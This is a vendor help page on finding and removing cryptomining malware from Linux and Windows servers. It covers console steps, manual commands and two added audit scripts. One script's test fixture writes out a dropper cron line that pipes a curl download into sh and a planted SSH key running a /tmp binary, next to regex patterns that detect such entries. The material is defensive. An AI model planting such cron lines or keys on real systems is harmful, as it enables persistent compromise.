
Security Center:Best practices for handling mining programs

Last Updated:Oct 08, 2023

This topic describes the features that are provided by Security Center to handle mining programs. The features include security alerting, virus detection, virus blocking, attack source tracing, and attack analysis.

Prerequisites

  • The Security Center agent that is installed on your server is in the enabled state. You can view the status of the agent on the Server(s) tab of the Assets page. Security Center protects the server only when the agent is enabled.

  • If the agent is in the Disable Protection state, the agent is disabled and Security Center cannot protect the server. Enable the agent for the server. For more information, see Enable or disable server protection.

  • If the agent is in the Offline state and you have not installed it, Security Center cannot protect the server. Install the agent on the server. For more information, see Install the Security Center agent.

  • If you have installed the agent but it is still in the Offline state, the agent is not reporting to Security Center and the server stays unprotected until you find the cause. For more information, see Troubleshoot why the Security Center agent is offline.

Limits

You can handle mining programs that are detected on your server only if you use the Anti-virus, Advanced, Enterprise, or Ultimate edition of Security Center. Security Center Basic supports only threat detection and security alerting; it cannot handle alerts. If you use Security Center Basic, purchase the Anti-virus, Advanced, Enterprise, or Ultimate edition before you handle alerts. For more information, see Purchase Security Center.


Free trial

Security Center provides a 7-day free trial of the Ultimate edition for users of the Basic edition. If you have not purchased Security Center, you can apply for the trial and use the Ultimate edition to handle mining programs. For more information, see Apply for a 7-day free trial of Security Center.

Characteristics of mining programs

  • Mining programs drive the CPU to sustained full load, which consumes most of the CPU resources of the server and slows down the other applications that run on it.

  • Mining programs behave like computer worms. After a mining program intrudes into a server, it spreads to the other servers that are deployed in the same internal network and establishes persistence on every server that it compromises.

  • In most cases, mining programs hook into multiple system services and are difficult to remove completely. They may reappear after you remove them, and system commands may have been replaced with malicious scripts, so the server may also run other malware, such as the XOR DDoS trojan. While you handle the mining program, remove all trojans and persistence mechanisms, such as webshells, from the server. Otherwise, the mining program is restored from one of them.

Determine whether your assets contain mining programs

If the CPU utilization of your server increases significantly, for example, to 80% or higher, and an unknown process keeps transmitting packets, a mining program is probably running on your server. Confirm this by checking which process consumes the CPU, where its executable file is located, and which remote addresses it connects to; a mining program keeps a long-lived outbound connection to its mining pool. For more information, see How do I check whether mining programs exist in my assets?
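The following script is an added example of this check for a Linux server; it is not part of the original page and not Security Center's own code. It lists every process at or above the 80% threshold from the text together with the indicators that distinguish a miner from a legitimately busy service: the binary was deleted after launch, it runs from a temporary or dot-named directory, or it is named like a kernel thread but is backed by a real executable. The sample snapshot (PIDs, paths, and names) is constructed for the example; run the script with --live to take a real snapshot of the host.

```bash
#!/bin/sh
# Added example (not Security Center code): find the processes the text
# describes, i.e. CPU hogs whose binary is unknown, and say why each is suspect.
CPU_THRESHOLD="${CPU_THRESHOLD:-80}"   # percent, the figure used in the text

# snapshot_live: one tab-separated "pid<TAB>cpu<TAB>exe<TAB>comm" line per
# process. readlink on /proc/PID/exe appends "(deleted)" when the program
# unlinked its own binary, and fails for kernel threads, which have no binary.
snapshot_live() {
  ps -eo pid=,pcpu=,comm= | while read -r pid pcpu comm; do
    exe=$(readlink "/proc/$pid/exe" 2>/dev/null) || exe="-"
    printf '%s\t%s\t%s\t%s\n' "$pid" "$pcpu" "$exe" "$comm"
  done
}

# snapshot_sample: constructed data in the same format (PIDs, paths and names
# are made up for this example) so the triage logic can be exercised offline.
snapshot_sample() {
  printf '1\t0.1\t/usr/lib/systemd/systemd\tsystemd\n'
  printf '812\t2.4\t/usr/sbin/sshd\tsshd\n'
  printf '2281\t97.3\t/tmp/.X11-unix/kdevtmpfsi\tkdevtmpfsi\n'
  printf '2302\t88.0\t/usr/bin/.sys (deleted)\tkworker/0:0\n'
  printf '2340\t91.5\t/opt/app/bin/encoder\tencoder\n'
  printf '12\t0.0\t-\tkworker/1:1\n'
}

# triage: keep processes at or above the CPU threshold and attach the
# indicators that separate a miner from a legitimately busy service:
#   exe-deleted        binary removed from disk after launch
#   exe-hidden-or-tmp  runs from a world-writable or dot-named directory
#   fake-kthread       named like a kernel thread but backed by a real binary
# A busy process with no indicator is still printed, marked REVIEW.
triage() {
  awk -F'\t' -v thr="${1:-$CPU_THRESHOLD}" '
    $2 + 0 >= thr + 0 {
      r = ""
      if ($3 ~ /\(deleted\)$/) r = r " exe-deleted"
      if ($3 ~ /^\/(tmp|var\/tmp|dev\/shm)\// || $3 ~ /\/\.[^\/]+\//) r = r " exe-hidden-or-tmp"
      if ($4 ~ /^(kworker|kthreadd|ksoftirqd|migration)/ && $3 != "-") r = r " fake-kthread"
      printf "%s pid=%s cpu=%s exe=%s comm=%s%s\n", (r == "" ? "REVIEW " : "SUSPECT"), $1, $2, $3, $4, r
    }'
}

# For every SUSPECT pid, the next step is its command line and its sockets; a
# miner holds a long-lived outbound connection to the pool:
#   tr '\0' ' ' < /proc/PID/cmdline; echo
#   ss -tnp state established | grep "pid=PID,"    # needs root to see other users' sockets
if [ "${1:-}" = "--live" ]; then snapshot_live | triage; else snapshot_sample | triage; fi
```

The ps pcpu column is averaged over the lifetime of the process, so a miner that has been running for days shows a stable, high value while a short build job does not; lower the threshold with CPU_THRESHOLD if the miner throttles itself.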

Use Security Center to handle mining programs

  1. Access the Alerts page of the Security Center console.

  2. Security Center generates an alert when it detects a mining program. In the alert list of the Alerts page, find the alert that is generated for the mining program in the Event column, and click Process in the Actions column.

    Important

    If you find alerts in the console or receive notifications, we recommend that you use the antivirus feature to scan and remove hidden malicious files and persistent malicious files at the earliest opportunity. For more information, see Use the virus detection and removal feature.

  3. In the dialog box that appears, select Anti-Virus, select Isolate the source file of the process and End the process, and then click Process Now. Isolating the file together with ending the process prevents the mining program from restarting from the same file.

    Security Center can handle multiple alerts at a time. To handle all alerts that are triggered by the same rule or by rules of the same type in one operation, select Batch unhandled.

  4. To handle an alert that is generated for the network activity of a mining program, for example, communication with a mining pool, find the alert, click Process in the Actions column, and then select Block in the dialog box that appears.

    Security Center generates policies that prevent the server from communicating with the IP addresses of the mining pool. This way, the mining program can no longer submit work while you handle the security event. You can also add the IP addresses of mining pools to a security group rule to block them. Blocking the pool does not remove the mining program or its persistence mechanisms; you still need to remove them.

  5. View the alerts that are generated for suspicious processes, and check whether unusual scheduled tasks exist. A scheduled task is a common way for a mining program to restart itself after it is removed.
  6. Enable the virus blocking feature.

    If mining programs keep reappearing on your server after you remove them, enable the virus blocking feature of Security Center to block them and prevent them from running. For more information about how to enable the virus blocking feature, see Use proactive defense.

    • You can use the antivirus feature of Security Center to scan your server. The scan results are displayed on the Alerts page. The feature also removes the persistent items of malicious files. The persistent items include self-starting items and scheduled tasks. For more information, see Use the virus detection and removal feature.

      Note

      After the virus scan is complete, we recommend that you handle the alerts that are reported on the Alerts page at the earliest opportunity to ensure the security of your server.

    • You can also use the attack source tracing feature of Security Center to trace the intrusion process and analyze how the mining program intruded into your server. For more information, see Attack Source Tracing.

Use other methods to handle mining programs

Mining programs often plant many persistence mechanisms, such as webshells, on a victim server so that they keep mining for as long as possible. In this case, the malicious files are difficult or impossible to remove one by one. If you have not purchased Security Center, you can perform the following steps to detect and handle mining programs manually.

Linux servers

  1. Identify the mining program among the processes that cause high CPU consumption, and note its process ID (PID).

  2. Run the following command to find the executable file of the mining program:

    ls -l /proc/xxx/exe           # xxx indicates the PID of the mining program
    If the link target ends with "(deleted)", the mining program removed its own file after it started. The file is still readable through /proc/xxx/exe as long as the process runs, so copy it from there first if you want to analyze it.

  3. Terminate the process, and then remove the executable file. If the process reappears right after you terminate it, a watchdog process, scheduled task, or modified system service restarts it. Find and remove that mechanism in the following steps, and then terminate the process again.

  4. Check whether the firewall rules of your server were modified to allow the address of the mining pool or ports that your workloads do not need, and delete those rules.

    1. Run the following command to list the current rules, and look for unknown communication addresses and open ports that are not required for normal workloads:

       iptables -L -n
    2. Run the following command to delete the address of the mining pool from the persistent rule file:

       vi /etc/sysconfig/iptables
       This file exists only on systems that use the iptables-services package. On other systems, delete the rule with the iptables command and then save the rule set with the tool of your distribution.
  5. Run the following command to check whether scheduled tasks exist:

    crontab -l
    This command lists only the crontab of the current user. Also check the system-wide locations, such as /etc/crontab and /etc/cron.d, and the crontabs of other users, including root.

    You can handle suspicious scheduled task files based on the check results. This prevents the mining program from being reinstalled.

  6. Run the following command to check whether the SSH authorized_keys file contains public keys that you did not add. Attackers add their own key so that they keep SSH access after the mining program is removed:

    cat ~/.ssh/authorized_keys
    Check the file for the root account and for every other user account on the server, and delete any unknown key.
  7. Check whether mining programs exist on other servers that are deployed on the same internal network. This way, you can protect the servers from mining programs at the earliest opportunity.
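The following script is an added example that covers steps 4 to 6 above; it is not part of the original page and not Security Center's own code. It audits the standard cron locations and every authorized_keys file, flags the cron patterns typical of miner droppers (download piped into a shell, inline base64 decoding, anything launched from /tmp or /dev/shm), and shows the iptables rule that drops egress to a mining-pool address. The ROOT variable, the IPTABLES_DRY_RUN switch, and the fixture with the documentation address 192.0.2.10 are assumptions of this example; the fixture data is constructed, not from a real incident.

```bash
#!/bin/sh
# Added example (not Security Center code): audit the persistence locations
# that steps 4 to 6 inspect, and block a mining-pool address on egress.
# ROOT prefixes every path, so the audit can run on a mounted copy of a
# compromised disk or on the constructed fixture below; empty means this host.
# IPTABLES_DRY_RUN=1 (the default) prints the firewall command instead of
# running it.
ROOT="${ROOT:-}"
IPTABLES_DRY_RUN="${IPTABLES_DRY_RUN:-1}"

# Patterns typical of miner droppers in cron entries: download piped into a
# shell, inline base64 decoding, and anything run from a world-writable directory.
SUSPICIOUS_CRON='(curl|wget)[^|]*[|][[:space:]]*(ba)?sh|base64[[:space:]]+(-d|--decode)|/(tmp|dev/shm|var/tmp)/'

# audit_cron: print every active entry under the standard cron locations as
# "FLAG path: line" when it matches SUSPICIOUS_CRON, otherwise "OK   path: line".
# Comments, blank lines and variable assignments (SHELL=, PATH=, MAILTO=) are skipped.
audit_cron() {
  for f in "$ROOT/etc/crontab" "$ROOT"/etc/cron.d/* \
           "$ROOT"/var/spool/cron/* "$ROOT"/var/spool/cron/crontabs/*; do
    [ -f "$f" ] || continue
    grep -Ev '^[[:space:]]*(#|$)|^[[:space:]]*[A-Za-z_]+=' "$f" | while IFS= read -r line; do
      if printf '%s\n' "$line" | grep -Eq "$SUSPICIOUS_CRON"; then
        printf 'FLAG %s: %s\n' "$f" "$line"
      else
        printf 'OK   %s: %s\n' "$f" "$line"
      fi
    done
  done
  return 0
}

# audit_authorized_keys: list every key that can log in as root or any user
# (type, comment, and any key options), so it can be compared with the keys
# you actually issued. An unknown key is the attacker's way back in.
audit_authorized_keys() {
  for f in "$ROOT/root/.ssh/authorized_keys" "$ROOT"/home/*/.ssh/authorized_keys; do
    [ -f "$f" ] || continue
    grep -Ev '^[[:space:]]*(#|$)' "$f" | awk -v file="$f" '{
      i = 1; while (i <= NF && $i !~ /^(ssh-|ecdsa-|sk-)/) i++   # options precede the type
      type = $i; comment = ""
      for (j = i + 2; j <= NF; j++) comment = comment " " $j       # everything after the key blob
      printf "KEY %s: %s%s%s\n", file, type, comment, (i > 1 ? " [has options: " $1 "]" : "")
    }'
  done
  return 0
}

# block_pool_ip: drop outbound traffic to a pool address. This stops the miner
# from submitting work and buys time; it is not a cleanup step.
block_pool_ip() {
  rule="OUTPUT -d $1 -j DROP"
  if [ "$IPTABLES_DRY_RUN" = 1 ]; then
    printf 'iptables -I %s\n' "$rule"
  else
    # -C exits non-zero when the rule is absent, so this never inserts a duplicate.
    # $rule is unquoted on purpose so that it splits into arguments.
    iptables -C $rule 2>/dev/null || iptables -I $rule
    # Persist with iptables-save (> /etc/sysconfig/iptables on iptables-services
    # systems) or netfilter-persistent save on Debian and Ubuntu.
  fi
}

# make_fixture: constructed filesystem snapshot (sample data, not from a real
# incident; 192.0.2.10 is a documentation address) for exercising the audit
# functions offline. Prints the directory it created.
make_fixture() {
  d=$(mktemp -d)
  mkdir -p "$d/etc/cron.d" "$d/var/spool/cron" "$d/root/.ssh" "$d/home/app/.ssh"
  cat > "$d/etc/crontab" <<'EOF'
SHELL=/bin/sh
# m h dom mon dow user command
0 2 * * * root /usr/sbin/logrotate /etc/logrotate.conf
EOF
  # the classic re-infection entry: fetch and run the dropper every minute
  printf '* * * * * curl -fsSL http://192.0.2.10/x.sh | sh\n' > "$d/var/spool/cron/root"
  printf 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyDataAAAAAAAAAAAAAAAAAAAAAAA admin@corp\n' > "$d/root/.ssh/authorized_keys"
  printf 'command="/tmp/.x/run" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQExampleKeyData=\n' >> "$d/root/.ssh/authorized_keys"
  printf '%s\n' "$d"
}

if [ "${1:-}" = "--live" ]; then
  ROOT=""; audit_cron; audit_authorized_keys    # also run "crontab -l -u USER" for each user
else
  ROOT=$(make_fixture); audit_cron; audit_authorized_keys; block_pool_ip 192.0.2.10; rm -rf "$ROOT"
fi
```

Run it with --live as root on the suspect server (or with ROOT pointing at a mounted disk image) and compare every KEY line with the keys you issued; the cron audit only flags known dropper patterns, so read the OK lines as well. Set IPTABLES_DRY_RUN=0 to apply the block for real.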

Windows servers

  1. Run the following commands in PowerShell to identify mining programs among the processes that cause high CPU consumption. The CPU column is the total processor time that each process has consumed, so a long-running mining program sorts to the top:

     ps | sort -des cpu
     While(1) {ps | sort -des cpu | select -f 15 | ft -a; sleep 1; cls}
  2. Run the following command to query the executable file of the mining program and the parameters in the command that is used to start the mining program:

    wmic process where processid=xxx get processid,executablepath,commandline,name     # xxx indicates the PID
    On Windows versions where wmic is no longer available, query the Win32_Process class from PowerShell instead.
  3. Terminate the mining program and remove the executable file of the mining program.

  4. Run the following command to check which process listens on or connects over a suspicious port. The last column is the PID of the owning process:

    netstat -ano | findstr xxx            # xxx indicates the suspicious port
  5. Run the following command to check whether the hosts file in the server contains the address of the mining pool to which the mining program belongs:

    type C:\Windows\System32\drivers\etc\hosts
  6. Run the following command to check whether the scheduled tasks that the mining program created exist on your server. The verbose output includes the Task To Run field, which shows the command that each task runs:

    schtasks /query /fo LIST /v

Other methods

If the underlying system components of your server are affected by viruses, you may be unable to locate or remove them. We recommend that you back up your data and then reinstall the operating system of your server. This ensures that the mining program is completely removed. To use this method, perform the following operations:

  1. Create a snapshot to back up data on your server. For more information, see Create a snapshot for a disk.

  2. Initialize the operating system of the server. For more information, see Re-initialize a system disk.

  3. Create a disk from the snapshot. For more information, see Create a disk from a snapshot.

  4. Attach the disk to the server after the operating system is reinstalled. For more information, see Attach a data disk.

Alibaba Cloud provides the Emergency Response service that is delivered by security experts. The following list describes the service content:

  • Remove trojans, viruses, suspicious accounts, suspicious files, webshells, and hidden links from the system in a comprehensive manner.

  • Analyze intrusion behavior and identify causes of intrusions.

  • Provide guidance on security hardening.